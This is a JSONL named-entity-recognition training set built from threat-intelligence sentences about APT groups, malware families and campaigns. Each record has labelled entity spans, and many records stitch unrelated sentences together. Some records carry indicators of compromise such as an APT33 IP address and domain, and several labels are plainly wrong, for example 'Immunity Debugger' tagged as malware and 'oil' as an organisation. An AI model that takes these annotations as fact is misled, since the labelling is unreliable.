{"text": "Attackers are growing smarter , targeting individuals through the devices and the services they use most . At this stage , the malware gathers information about the infected computer . APT1 uses hijacked FQDNs for two main purposes . Recognizing and stopping the above malicious JavaScript request requires advanced visibility solutions that can detect the access and exfiltration of sensitive user data ( in this case the user ’s email address and password ) .", "spans": {"THREAT_ACTOR: APT1": [[185, 189]], "TOOL: FQDNs": [[204, 209]]}, "info": {"id": "cyberner_stix_train_003090", "source": "cyberner_stix_train"}}
{"text": "The “ core ” module will use one of two methods to infect the application – Decompile and Binary . However , it is still widely used , notably in Russia . These are the same two URLs that Dexphot use later to establish persistence , update the malware , and re-infect the device . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"MALWARE: Dexphot": [[188, 195]], "ORGANIZATION: victims": [[291, 298]], "TOOL: NetSupport RAT": [[347, 361]], "THREAT_ACTOR: threat actors": [[373, 386]]}, "info": {"id": "cyberner_stix_train_003091", "source": "cyberner_stix_train"}}
{"text": "It is easy to imagine a security analyst , burdened by the amount of attacks against their network , dismissing such common-looking spam as “ just another crimeware spam run ” , allowing the campaign to , in essence , hide in the masses .", "spans": {}, "info": {"id": "cyberner_stix_train_003092", "source": "cyberner_stix_train"}}
{"text": "These examples reveal BRONZE PRESIDENT 's likely intent to conduct political espionage in other countries in addition to targeting NGOs .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[22, 38]], "ORGANIZATION: NGOs": [[131, 135]]}, "info": {"id": "cyberner_stix_train_003093", "source": "cyberner_stix_train"}}
{"text": "This group , which has been attributed by various security teams , is believed to be comprised of three subgroups :", "spans": {}, "info": {"id": "cyberner_stix_train_003094", "source": "cyberner_stix_train"}}
{"text": "For example , one sent out to a handful of countries identifies network drives when they are added to target systems , and then RC4 like-encrypts and writes certain file metadata and contents to a local path for later Exfiltration .", "spans": {}, "info": {"id": "cyberner_stix_train_003096", "source": "cyberner_stix_train"}}
{"text": "The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process . Confucius targeted a particular set of individuals in South Asian countries , such as military personnel and businessmen , among others .", "spans": {"MALWARE: configuration file": [[4, 22]], "ORGANIZATION: military personnel": [[200, 218]], "ORGANIZATION: businessmen": [[223, 234]]}, "info": {"id": "cyberner_stix_train_003097", "source": "cyberner_stix_train"}}
{"text": "The IP address of both ora.carlaarrabitoarchitetto [ . The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . PyCommands , meanwhile , are Python scripts that automate tasks for Immunity Debugger , a popular tool for reverse-engineering malware binaries .", "spans": {"MALWARE: BalkanRAT malware": [[76, 93]], "TOOL: Python": [[186, 192]], "MALWARE: Immunity Debugger": [[225, 242]]}, "info": {"id": "cyberner_stix_train_003098", "source": "cyberner_stix_train"}}
{"text": "A Communication Channel via Stolen SMS In addition , TrickMo has an automatic mechanism to send SMS messages to its C & C server . The lack of any significant evidence of shared code between any of these backdoor families is another clue as to the scope of the resources on which the activity group is able to draw , and the precautions the group is willing and able to take in order to avoid losing its ability to conduct its espionage operations . According to Symantec telemetry , almost 40 percent of Orangeworm 's confirmed victim organizations operate within the healthcare industry .", "spans": {"MALWARE: TrickMo": [[53, 60]], "THREAT_ACTOR: activity group": [[284, 298]], "THREAT_ACTOR: group": [[341, 346]], "ORGANIZATION: Symantec": [[463, 471]], "ORGANIZATION: healthcare industry": [[569, 588]]}, "info": {"id": "cyberner_stix_train_003099", "source": "cyberner_stix_train"}}
{"text": "Poseidon Group is dedicated to running targeted attacks campaigns to aggressively collect information from company networks through the use of spear-phishing packaged with embedded , executable elements inside office documents and extensive lateral movement tools . Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {"THREAT_ACTOR: Poseidon Group": [[0, 14]], "THREAT_ACTOR: Nitro": [[266, 271]], "ORGANIZATION: chemical sector": [[299, 314]]}, "info": {"id": "cyberner_stix_train_003100", "source": "cyberner_stix_train"}}
{"text": "Collect information on surrounding cellular towers ( BTS ) . Strider has been active since at least October 2011 . For more information about part one , click here . Because indicators of attack are all about interactions with your network , it may be possible that the actions performed during the early stages of the cyberattack kill chain are not considered harmful .", "spans": {"THREAT_ACTOR: Strider": [[61, 68]]}, "info": {"id": "cyberner_stix_train_003101", "source": "cyberner_stix_train"}}
{"text": "At any time an infected application will create an activity , this method will be called , and call ‘ requestAd ’ from “ Agent Smith ’ s code . Clever Kitten has moved to leveraging strategic web compromises . Although Dexphot always uses a cryptocurrency miner of some kind , it ’s not always the same miner . Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": {"MALWARE: Agent Smith": [[121, 132]], "THREAT_ACTOR: Clever Kitten": [[144, 157]], "MALWARE: Dexphot": [[219, 226]], "ORGANIZATION: Mandiant Managed Defense": [[339, 363]], "SYSTEM: Microsoft Exchange Server": [[404, 429]]}, "info": {"id": "cyberner_stix_train_003102", "source": "cyberner_stix_train"}}
{"text": "The Cybereason Nocturnus team is monitoring multiple underground platforms in an attempt to identify chatter relating to EventBot . The first confirmed date when TajMahal samples were seen on a victim’s machine is August 2014 . While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[4, 24]], "MALWARE: EventBot": [[121, 129]], "MALWARE: TajMahal": [[162, 170]], "ORGANIZATION: Trend Micro": [[256, 267]], "ORGANIZATION: ClearSky": [[272, 280]], "THREAT_ACTOR: Spy Kittens": [[289, 300]], "THREAT_ACTOR: Rocket Kitten": [[312, 325]]}, "info": {"id": "cyberner_stix_train_003103", "source": "cyberner_stix_train"}}
{"text": "Enigma packer artifacts in file metadata ( SHA-256: b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca ) .", "spans": {"TOOL: Enigma": [[0, 6]], "FILEPATH: b08b8fddb9dd940a8ab91c9cb29db9bb611a5c533c9489fb99e36c43b4df1eca": [[52, 116]]}, "info": {"id": "cyberner_stix_train_003104", "source": "cyberner_stix_train"}}
{"text": "] meacount-manager [ . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . In the last two years alone , we have confirmed 937 APT1 C2 servers — that is , actively listening or communicating programs — running on 849 distinct IP addresses . Adversaries may abuse these features to hide artifacts such as files , directories , user accounts , or other system activity to evade detection.[1][2][3 ]", "spans": {"MALWARE: Cyberlink": [[72, 81]], "THREAT_ACTOR: APT1": [[231, 235]], "TOOL: C2": [[236, 238]], "THREAT_ACTOR: Adversaries": [[345, 356]]}, "info": {"id": "cyberner_stix_train_003105", "source": "cyberner_stix_train"}}
{"text": "Tune the file reputation systems of your anti-virus software to the most aggressive setting possible .", "spans": {}, "info": {"id": "cyberner_stix_train_003106", "source": "cyberner_stix_train"}}
{"text": "New versions of FakeSpy masquerade as government post office apps and transportation services apps . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries .", "spans": {"MALWARE: FakeSpy": [[16, 23]], "ORGANIZATION: U.S. Cyber": [[124, 134]], "THREAT_ACTOR: group": [[183, 188]], "MALWARE: Carbanak": [[266, 274]], "THREAT_ACTOR: cyber-criminal gang": [[279, 298]], "ORGANIZATION: financial institutions": [[400, 422]]}, "info": {"id": "cyberner_stix_train_003107", "source": "cyberner_stix_train"}}
{"text": "It first starts another activity defined in “ org.starsizew.Aa ” to request device administrator privileges , and then calls the following API of “ android.content.pm.PackageManager ” ( the Android package manager to remove its own icon on the home screen in order to conceal the existence of RuMMS from the user : At the same time , ” org.starsizew.MainActivity ” will start the main service as defined in “ org.starsizew.Tb ” , and use a few mechanisms to keep the main service running continuously In May 2016 , Unit 42 observed attacks of OilRig primarily focused on financial institutions and technology organizations within Saudi Arabia . So let ’s start to dissect the macros . Unlike a number of past cases of Iranian statesponsored social media phishing that have focused on Irans neighbors , this latest campaign appears to have largely targeted Americans and to a lesser extent British and European victims .", "spans": {"SYSTEM: Android": [[190, 197]], "MALWARE: RuMMS": [[293, 298]], "ORGANIZATION: Unit 42": [[515, 522]], "THREAT_ACTOR: OilRig": [[543, 549]], "ORGANIZATION: financial institutions": [[571, 593]], "ORGANIZATION: technology organizations": [[598, 622]], "TOOL: macros": [[676, 682]], "ORGANIZATION: Irans neighbors": [[784, 799]], "ORGANIZATION: Americans": [[856, 865]], "ORGANIZATION: British and European victims": [[889, 917]]}, "info": {"id": "cyberner_stix_train_003108", "source": "cyberner_stix_train"}}
{"text": "] 230 [ . Of note , we also discovered the Sofacy group using a very similar delivery document to deliver a new Trojan called Cannon . The area highlighted in blue is the shape name that is being located , while the text itself is highlighted in red . If you can not apply the KB5019758 patch immediately , you should disable OWA until the patch can be applied .", "spans": {"THREAT_ACTOR: Sofacy group": [[43, 55]], "TOOL: Trojan": [[112, 118]], "TOOL: Cannon": [[126, 132]]}, "info": {"id": "cyberner_stix_train_003109", "source": "cyberner_stix_train"}}
{"text": "Fragment of the database with targeted devices and specific memory addresses If the infected device is not listed in this database , the exploit tries to discover these addresses programmatically . specifically CVE-2018-0798 , before downloading subsequent payloads . Tropic Trooper is an unaffiliated threat group that has led targeted campaigns against targets in Taiwan , the Philippines , and Hong Kong .", "spans": {"VULNERABILITY: CVE-2018-0798": [[211, 224]], "THREAT_ACTOR: Tropic Trooper": [[268, 282]]}, "info": {"id": "cyberner_stix_train_003110", "source": "cyberner_stix_train"}}
{"text": "WICKED PANDA refers to the targeted intrusion operations of the actor publicly known as \" Winnti \" , whereas WICKED SPIDER represents this group 's financially-motivated criminal activity . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: WICKED PANDA": [[0, 12]], "THREAT_ACTOR: WICKED SPIDER": [[109, 122]], "THREAT_ACTOR: APT28": [[190, 195]], "TOOL: Flash": [[239, 244]], "VULNERABILITY: exploits": [[245, 253]], "MALWARE: Carberp": [[271, 278]], "MALWARE: JHUHUGIT downloaders": [[285, 305]]}, "info": {"id": "cyberner_stix_train_003111", "source": "cyberner_stix_train"}}
{"text": "These attacks occurred in several different countries , but our investigation revealed that the primary targets were individuals and organizations primarily located in India .", "spans": {}, "info": {"id": "cyberner_stix_train_003112", "source": "cyberner_stix_train"}}
{"text": "Shamoon is designed to destroy computer hard drives by wiping the master boot record ( MBR ) and data irretrievably , unlike ransomware , which holds the data hostage for a fee .", "spans": {"MALWARE: Shamoon": [[0, 7]]}, "info": {"id": "cyberner_stix_train_003113", "source": "cyberner_stix_train"}}
{"text": "A similar tool , with the same filename , has been discussed in previous research but the SpyDealer malware appears unrelated to HenBox . APT41 uses many of the same tools and compromised digital certificates that have been leveraged by other Chinese espionage operators . Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement .", "spans": {"MALWARE: SpyDealer": [[90, 99]], "MALWARE: HenBox": [[129, 135]], "THREAT_ACTOR: APT41": [[138, 143]], "TOOL: digital certificates": [[188, 208]], "MALWARE: backdoors": [[330, 339]], "MALWARE: USB stealers": [[342, 354]], "MALWARE: Mimikatz": [[396, 404]]}, "info": {"id": "cyberner_stix_train_003114", "source": "cyberner_stix_train"}}
{"text": "In fact , recent variants contain code forked from an open-source machine learning module used by developers to automatically resize and crop images based on screen size , a valuable function given the variety of Android devices . The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . The modified code is available publically here . We highly suspect the “ Pig network ” to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": {"SYSTEM: Android": [[213, 220]], "THREAT_ACTOR: Ke3chang": [[235, 243]], "ORGANIZATION: aerospace": [[328, 337]], "ORGANIZATION: energy": [[340, 346]], "ORGANIZATION: government": [[349, 359]], "ORGANIZATION: high-tech": [[362, 371]], "ORGANIZATION: consulting services": [[374, 393]], "ORGANIZATION: chemicals": [[396, 405]], "ORGANIZATION: manufacturing": [[408, 421]], "ORGANIZATION: mining sectors": [[424, 438]], "SYSTEM: Pig network": [[514, 525]], "SYSTEM: bulletproof hosting service": [[556, 583]], "THREAT_ACTOR: Winnti group": [[628, 640]]}, "info": {"id": "cyberner_stix_train_003115", "source": "cyberner_stix_train"}}
{"text": "From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" .", "spans": {"MALWARE: Locky": [[43, 48]], "ORGANIZATION: Microsoft": [[190, 199]], "THREAT_ACTOR: Barium": [[251, 257]], "FILEPATH: Win32/ShadowPad.A": [[296, 313]]}, "info": {"id": "cyberner_stix_train_003116", "source": "cyberner_stix_train"}}
{"text": "A snapshot of the code that processes each VM opcode and the associate interpreter The presence of a VM and virtualized instruction blocks can be described in simpler terms : Essentially , the creators of FinFisher interposed a layer of dynamic code translation ( the virtual machine ) that makes analysis using regular tools practically impossible . Of note , this is three years earlier than the oldest Elise sample we have found , suggesting this group has been active longer than previously documented . Given the popularity of the compromised application that is still being distributed by its developer , it wouldn’t be surprising if the number of victims is in the tens or hundreds of thousands . There are also many examples of nation - state actors leveraging contractors to develop offensive capabilities , as shown most recently in contracts between Russia ’s Ministry of Defense and NTC Vulkan .", "spans": {"MALWARE: snapshot": [[2, 10]], "MALWARE: FinFisher": [[205, 214]], "TOOL: Elise sample": [[405, 417]], "THREAT_ACTOR: group": [[450, 455]], "THREAT_ACTOR: nation - state actors": [[736, 757]], "THREAT_ACTOR: Russia ’s Ministry of Defense": [[861, 890]], "THREAT_ACTOR: NTC Vulkan": [[895, 905]]}, "info": {"id": "cyberner_stix_train_003117", "source": "cyberner_stix_train"}}
{"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks .", "spans": {"TOOL: PIVY": [[0, 4], [266, 270]], "ORGANIZATION: government agencies": [[96, 115]], "ORGANIZATION: defense contractors": [[118, 137]], "THREAT_ACTOR: attackers": [[208, 217]], "VULNERABILITY: zero-day vulnerability": [[225, 247]], "ORGANIZATION: TAA": [[281, 284]], "ORGANIZATION: Symantec": [[368, 376]]}, "info": {"id": "cyberner_stix_train_003118", "source": "cyberner_stix_train"}}
{"text": "The description in Portuguese promises more protection for the user ’ s applications , including end-to-end encryption . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . While the capabilities for the installers , loaders , and uninstallers in this report are relatively straight forward and single-focused , analysis of these malware families provide further insight into the capabilities of the Lazarus Group .", "spans": {"THREAT_ACTOR: TA505": [[121, 126]], "MALWARE: installers": [[310, 320]], "MALWARE: loaders": [[323, 330]], "MALWARE: uninstallers": [[337, 349]], "THREAT_ACTOR: Lazarus Group": [[506, 519]]}, "info": {"id": "cyberner_stix_train_003119", "source": "cyberner_stix_train"}}
{"text": "After compromising a network , the threat actors elevate their privileges and install malware on a large proportion of systems .", "spans": {}, "info": {"id": "cyberner_stix_train_003120", "source": "cyberner_stix_train"}}
{"text": "As Lookout first reported more than eight months ago , the problem with Shedun/HummingBad and similar malicious app families that silently exploit Android rooting vulnerabilities is that the infections can survive normal factory resets . Leafminer attempts to infiltrate target networks through various means of intrusion : watering hole websites , vulnerability scans of network services on the internet , and brute-force login attempts . APT33 : 5.79.127.177 mypsh.ddns.net . \" Learn about indicators of compromise and their role in detection and response in Data Protection 101 , our series on the fundamentals of information security .", "spans": {"ORGANIZATION: Lookout": [[3, 10]], "MALWARE: Shedun/HummingBad": [[72, 89]], "VULNERABILITY: Android rooting vulnerabilities": [[147, 178]], "THREAT_ACTOR: Leafminer": [[238, 247]], "THREAT_ACTOR: APT33": [[440, 445]], "IP_ADDRESS: 5.79.127.177": [[448, 460]], "DOMAIN: mypsh.ddns.net": [[461, 475]], "ORGANIZATION: Data Protection 101": [[561, 580]]}, "info": {"id": "cyberner_stix_train_003121", "source": "cyberner_stix_train"}}
{"text": "It is clear that this RAT is under intense development , however , the addition and removal of packages , along with the huge quantity of unused code and usage of deprecated and old techniques denotes an amateur development methodology . The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables . WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor . Instead , victims would end up infecting their computers with the NetSupport RAT , allowing threat actors to gain remote access and deliver additional payloads .", "spans": {"TOOL: MoonWind samples": [[343, 359]], "TOOL: RAR files": [[363, 372]], "TOOL: RATs": [[409, 413]], "MALWARE: WATERSPOUT": [[443, 453]], "MALWARE: HIGHTIDE backdoor": [[495, 512]], "MALWARE: THREEBYTE backdoor": [[540, 558]], "ORGANIZATION: victims": [[571, 578]], "TOOL: NetSupport RAT": [[627, 641]], "THREAT_ACTOR: threat actors": [[653, 666]]}, "info": {"id": "cyberner_stix_train_003122", "source": "cyberner_stix_train"}}
{"text": "In the The first wave of attack , The attackers spoofed an email id that is associated with Indian Ministry of Home Affairs ( MHA ) and an email was sent on September 20th , 2016 ( just 2 days after the Uri terror attack ) to an email id associated with the Indian Embassy in Japan .", "spans": {"TOOL: email": [[59, 64], [139, 144], [229, 234]], "ORGANIZATION: Ministry of Home Affairs": [[99, 123]], "ORGANIZATION: MHA": [[126, 129]], "ORGANIZATION: Indian Embassy": [[258, 272]]}, "info": {"id": "cyberner_stix_train_003123", "source": "cyberner_stix_train"}}
{"text": "Other configuration data is located elsewhere , and some of it can been seen here : The encrypted library path The output folder on the device for the dropped library The name of the library after it is loaded eventBot name string Version number A string used as an RC4 key , both for decrypting the library and as a part of the network data encryption ( hasn ’ t changed from the previous version ) The C2 URLs A randomized class name using the device ’ s accessibility services EventBot extracted configuration Part of the extracted configuration of the new version Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json” . SecureWorks Counter Threat Unit ( CTU ) researchers analyzed a phishing campaign that targeted a Middle Eastern organization in early January 2017 .", "spans": {"MALWARE: EventBot": [[480, 488]], "MALWARE: SWAnalytics": [[637, 648]], "ORGANIZATION: SecureWorks Counter Threat Unit": [[746, 777]], "ORGANIZATION: CTU": [[780, 783]], "ORGANIZATION: organization": [[858, 870]]}, "info": {"id": "cyberner_stix_train_003124", "source": "cyberner_stix_train"}}
{"text": "Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail .", "spans": {}, "info": {"id": "cyberner_stix_train_003125", "source": "cyberner_stix_train"}}
{"text": "] 191 [ . Once a foothold is established , they try to upload more backdoors , USB stealers as well as other hacking tools such as \" Mimikatz \" for lateral movement . The variable names themselves are not relevant , however the methods in bold below will retrieve the AlternativeText field from the specified shape , which is then executed . The operation targeted individuals from three groups Senior thinktank personnel researching the Middle East , journalists focused on the region , and academics , including senior professors .", "spans": {"TOOL: backdoors": [[67, 76]], "TOOL: USB stealers": [[79, 91]], "TOOL: Mimikatz": [[133, 141]], "TOOL: AlternativeText": [[268, 283]], "ORGANIZATION: Senior thinktank personnel researching the Middle East": [[395, 449]], "ORGANIZATION: journalists focused on the region": [[452, 485]], "ORGANIZATION: and academics , including senior professors": [[488, 531]]}, "info": {"id": "cyberner_stix_train_003126", "source": "cyberner_stix_train"}}
{"text": "For example , sending text “ Balance ” will trigger a response with the victim ’ s wallet balance . During the past few months , APT34 has been able to quickly incorporate exploits for at least two publicly vulnerabilities ( CVE-2017-0199 and CVE-2017-11882 ) to target organizations in the Middle East . Attackers can abuse well-known cloud providers and abuse their reputations in order to avoid detection . To boot , there was a 75 percent increase in the average number of monthly attacks in the US between the first and second half of the last 12 months .", "spans": {"THREAT_ACTOR: APT34": [[129, 134]], "VULNERABILITY: CVE-2017-0199": [[225, 238]], "VULNERABILITY: CVE-2017-11882": [[243, 257]], "TOOL: well-known cloud providers": [[325, 351]], "THREAT_ACTOR: monthly attacks": [[477, 492]]}, "info": {"id": "cyberner_stix_train_003127", "source": "cyberner_stix_train"}}
{"text": "The samples we identified target the ATM vendor Diebold . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks .", "spans": {"MALWARE: samples": [[4, 11]], "ORGANIZATION: ATM vendor Diebold": [[37, 55]], "THREAT_ACTOR: Barium": [[58, 64]], "ORGANIZATION: employees": [[187, 196], [329, 338]], "ORGANIZATION: social media": [[240, 252]]}, "info": {"id": "cyberner_stix_train_003128", "source": "cyberner_stix_train"}}
{"text": "Google also stated that they are taking numerous steps including proactively notifying affected accounts , revoking affected tokens and deploying SafetyNet improvements to protect users from these apps in the future . This is corroborated by our identification of TEMP.Hermit 's use of MACKTRUCK at a bank , preceding the APT38 operation targeting the bank 's SWIFT systems in late 2015 . One layer will detect shellcode , Ashley Madison ’s executives understood that only a handful of employees at the time would have had access to the systems needed to produce the screenshots McNeill published online .", "spans": {"ORGANIZATION: Google": [[0, 6]], "THREAT_ACTOR: TEMP.Hermit": [[264, 275]], "TOOL: MACKTRUCK": [[286, 295]], "THREAT_ACTOR: APT38": [[322, 327]], "ORGANIZATION: bank": [[352, 356]], "ORGANIZATION: Ashley Madison ’s": [[423, 440]], "SYSTEM: systems needed to produce the screenshots McNeill published online": [[537, 603]]}, "info": {"id": "cyberner_stix_train_003129", "source": "cyberner_stix_train"}}
{"text": "Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . Another set of attacks called Operation Erebus leverages another flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[59, 72]], "TOOL: flash": [[231, 236]], "VULNERABILITY: exploit": [[237, 244]], "VULNERABILITY: CVE-2016-4117": [[247, 260]]}, "info": {"id": "cyberner_stix_train_003130", "source": "cyberner_stix_train"}}
{"text": "There have been cases in the past where a threat actor attempted to mimic another to thwart attribution efforts , and as such , attribution should rarely be taken as is , but instead with a grain of salt and critical thinking .", "spans": {}, "info": {"id": "cyberner_stix_train_003131", "source": "cyberner_stix_train"}}
{"text": "The Pierogi Campaign : This campaign uses social engineering attacks to infect victims with a new , undocumented backdoor dubbed Pierogi .", "spans": {"MALWARE: Pierogi": [[4, 11], [129, 136]]}, "info": {"id": "cyberner_stix_train_003132", "source": "cyberner_stix_train"}}
{"text": "The strings of code , for one , are similarly structured . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": {"THREAT_ACTOR: ScarCruft": [[59, 68]], "THREAT_ACTOR: FIN7": [[203, 207]], "MALWARE: malware": [[339, 346]], "ORGANIZATION: the game fans": [[360, 373]], "MALWARE: a malware module": [[378, 394]]}, "info": {"id": "cyberner_stix_train_003133", "source": "cyberner_stix_train"}}
{"text": "CTU researchers recognize that the evidence supporting this attribution is circumstantial .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_003134", "source": "cyberner_stix_train"}}
{"text": "Since the 2016 publication , Microsoft has come across an evolution of PLATINUM 's file-transfer tool , one that uses the Intel Active Management Technology ( AMT ) Serial-over-LAN ( SOL ) channel for communication . The purpose of the attacks appears to be industrial espionage , collecting intellectual property for competitive advantage .", "spans": {"ORGANIZATION: Microsoft": [[29, 38]], "THREAT_ACTOR: PLATINUM": [[71, 79]], "TOOL: Intel Active Management Technology": [[122, 156]], "TOOL: AMT": [[159, 162]], "TOOL: Serial-over-LAN": [[165, 180]], "TOOL: SOL": [[183, 186]]}, "info": {"id": "cyberner_stix_train_003135", "source": "cyberner_stix_train"}}
{"text": "The only noticeable difference is the game has more ads , including ads on the very first screen . Over the years they've used application components from Norman , McAfee and Norton . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China based APT group that we refer to as APT16 . For those who fall outside of that demographic , it ’s interesting that this group is still relying on the user enabling macros in Office , since Microsoft disabled those by default earlier this year .", "spans": {"ORGANIZATION: Norman": [[155, 161]], "ORGANIZATION: McAfee": [[164, 170]], "ORGANIZATION: Norton": [[175, 181]], "THREAT_ACTOR: APT16": [[363, 368]], "TOOL: Microsoft": [[517, 526]]}, "info": {"id": "cyberner_stix_train_003137", "source": "cyberner_stix_train"}}
{"text": "Once root is obtained , it downloads an additional APK file from the server ( mcpef.apk ) and installs it as system application ( /system directory ) . When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Moafee may have chosen its targets based on the rich resources of South China Sea region – the world 's second business sea-lane , according to Wikipedia – including rare earth metals , crude oil , and natural gas .", "spans": {"TOOL: Word": [[184, 188]], "VULNERABILITY: CVE-2015-2545": [[299, 312]], "THREAT_ACTOR: attacker": [[346, 354]], "THREAT_ACTOR: Moafee": [[428, 434]], "ORGANIZATION: oil": [[620, 623]], "ORGANIZATION: gas": [[638, 641]]}, "info": {"id": "cyberner_stix_train_003138", "source": "cyberner_stix_train"}}
{"text": "Phishing page from the French version of the Trojan Communication with C & C Riltok actively communicates with its C & C server . FireEye has tracked and profiled APT28 group through multiple investigations , endpoint and network detections , and continuous monitoring . The Russian document is not used by the sample , we assume that the author of the malware forgot to remove the resource containing the Russia decoy document .", "spans": {"MALWARE: Riltok": [[77, 83]], "ORGANIZATION: FireEye": [[130, 137]], "THREAT_ACTOR: APT28": [[163, 168]]}, "info": {"id": "cyberner_stix_train_003139", "source": "cyberner_stix_train"}}
{"text": "The data sent to the C2 follows a structured pattern that uses a predefined keywords array , where each keyword is mapped to a certain subroutine .", "spans": {"TOOL: C2": [[21, 23]]}, "info": {"id": "cyberner_stix_train_003140", "source": "cyberner_stix_train"}}
{"text": "The Zen trojan does not implement any kind of obfuscation except for one string that is encoded using Base64 encoding . The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States . This collaborative approach allowed the team to observe the malware and its victims . Together with our partner CrySyS Lab , we - ve performed a detailed analysis of these unusual incidents which suggest a new , previously unknown threat actor .", "spans": {"MALWARE: Zen": [[4, 7]], "TOOL: VPS": [[206, 209]], "ORGANIZATION: CrySyS Lab": [[355, 365]], "THREAT_ACTOR: unknown threat actor": [[466, 486]]}, "info": {"id": "cyberner_stix_train_003141", "source": "cyberner_stix_train"}}
{"text": "mike.jar implements most of the data collection and exfiltration capabilities of this spyware . As expected , OilRig is continuing their onslaught of attacks well into 2018 with continued targeting in the Middle East . JhoneRAT : 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4 . NIST does not necessarily endorse the views expressed , or concur with the facts presented on these sites .", "spans": {"THREAT_ACTOR: OilRig": [[110, 116]], "MALWARE: JhoneRAT": [[219, 227]], "FILEPATH: 6cc0c11c754e1e82bca8572785c27a364a18b0822c07ad9aa2dc26b3817b8aa4": [[230, 294]], "ORGANIZATION: NIST": [[297, 301]]}, "info": {"id": "cyberner_stix_train_003142", "source": "cyberner_stix_train"}}
{"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . It will ask for a password to run command as root .", "spans": {"MALWARE: them": [[22, 26]]}, "info": {"id": "cyberner_stix_train_003143", "source": "cyberner_stix_train"}}
{"text": "REQUEST_COMPANION_USE_DATA_IN_BACKGROUND - let the app use data in the background . Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group . Between August and November 2015 the malware author creates several new versions of Emissary , specifically 5.0 , 5.1 , 5.3 and 5.4 in a much more rapid succession compared to development process in earlier versions .", "spans": {"MALWARE: implant": [[187, 194]], "THREAT_ACTOR: Gamaredon": [[199, 208]], "MALWARE: Emissary": [[301, 309]]}, "info": {"id": "cyberner_stix_train_003144", "source": "cyberner_stix_train"}}
{"text": "The malware can be configured to use multiple network protocols to avoid network-based detection .", "spans": {}, "info": {"id": "cyberner_stix_train_003145", "source": "cyberner_stix_train"}}
{"text": "We have associated this campaign with APT19 , a group that we assess is composed of freelancers , with some degree of sponsorship by the Chinese government . Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": {"THREAT_ACTOR: APT19": [[38, 43]], "ORGANIZATION: Chinese": [[137, 144]], "ORGANIZATION: government": [[145, 155]], "ORGANIZATION: Iranians": [[225, 233]]}, "info": {"id": "cyberner_stix_train_003146", "source": "cyberner_stix_train"}}
